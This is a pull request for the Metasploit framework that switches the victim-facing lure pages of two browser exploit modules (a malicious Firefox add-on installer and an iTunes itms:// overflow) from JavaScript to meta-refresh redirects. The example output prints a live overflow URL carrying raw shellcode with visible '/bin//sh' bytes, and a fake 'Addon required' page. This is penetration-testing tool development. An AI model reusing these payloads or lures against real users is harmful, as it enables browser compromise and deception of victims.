### PR TITLE
Use meta redirect instead of JS redirect in 2 modules

### DIFF
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -65,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
+    html  = %Q|<html><head><title>Loading, Please Wait...</title>\n|
+    html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|
     html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
     html << %Q|</body></html>|
     return html
   end

--- a/modules/exploits/multi/browser/itms_overflow.rb
+++ b/modules/exploits/multi/browser/itms_overflow.rb
@@ -98,11 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Return back an example URL.  Using an iframe doesn't work with all
     # browsers, but that's easy enough to fix if you need to.
     return String(<<-EOS)
-<html><head><title>iTunes loading . . .</title></head>
+<html>
+<head>
+<title>iTunes loading . . .</title>
+<meta http-equiv="refresh" content="0; url='#{itms_base_url}'">
+</head>
 <body>
 <p>iTunes should open automatically, but if it doesn't, click to
 <a href="#{itms_base_url}">continue</a>.</p>
-<script>document.location.assign("#{itms_base_url}");</script>
 </body>
 </html>
 EOS


### PR DESCRIPTION
Resolves #8674 by using meta redirects instead of javascript based redirects in the following modules:

- exploit/multi/browser/firefox_xpi_bootstrapped_addon
- exploit/multi/browser/itms_overflow

More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `run` each exploit
- [x] **Verify** redirects happens even when javascript is disabled in the browser
- [x] **Verify** exploits still work

## Example HTML
### exploit/multi/browser/firefox_xpi_bootstrapped_addon
```
<html><head><title>Loading, Please Wait...</title>
<meta http-equiv="refresh" content="0; url=addon.xpi"></head>
<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
</body></html>
```
### exploit/multi/browser/itms_overflow
```
<html>
<head>
<title>iTunes loading . . .</title>
<meta http-equiv="refresh" content="0; url='itms://:HgCwzRzhepmaqRgTCWfWQeOoZWAyLyJVNnJEsfyxRXJqjFoozpJDRCVUqcymzbsUJBCTHbAFEIFSncjhqvlOTCRmwGvTXTcnSpPFmdRZGUGntCacDsTzDPBioznMwbUXUvhhOnGWDfibqwOBtfOOjAjDPxINtjCjbxlfhmmbRWoZpKKSypvEpEIbFflQqOVjrqlgOOrqBkKOLyLMqdxJSmrQzdCUZqfIFPGAVUeJkKTvIzNjyYlqfXMgqLJkqzGvLsYEcCevKWAXbpITTnFMLNQGKVGQATe/:!?1��P@P@PR�àrm��RRh
1h\��jSWR�b̀rR1ۃ�CSWS�Z̀rC��u�1�PPPP�;̀��<-u       �B̀��t1�Ph//shh/bin��PPSP�;̀1�P��PPSPP�̀1�PP@̀hMzN'">
</head>
<body>
<p>iTunes should open automatically, but if it doesn't, click to
<a href="itms://:HgCwzRzhepmaqRgTCWfWQeOoZWAyLyJVNnJEsfyxRXJqjFoozpJDRCVUqcymzbsUJBCTHbAFEIFSncjhqvlOTCRmwGvTXTcnSpPFmdRZGUGntCacDsTzDPBioznMwbUXUvhhOnGWDfibqwOBtfOOjAjDPxINtjCjbxlfhmmbRWoZpKKSypvEpEIbFflQqOVjrqlgOOrqBkKOLyLMqdxJSmrQzdCUZqfIFPGAVUeJkKTvIzNjyYlqfXMgqLJkqzGvLsYEcCevKWAXbpITTnFMLNQGKVGQATe/:!?1��P@P@PR�àrm��RRh
1h\��jSWR�b̀rR1ۃ�CSWS�Z̀rC��u�1�PPPP�;̀��<-u       �B̀��t1�Ph//shh/bin��PPSP�;̀1�P��PPSPP�̀1�PP@̀hMzN">continue</a>.</p>
</body>
</html>
```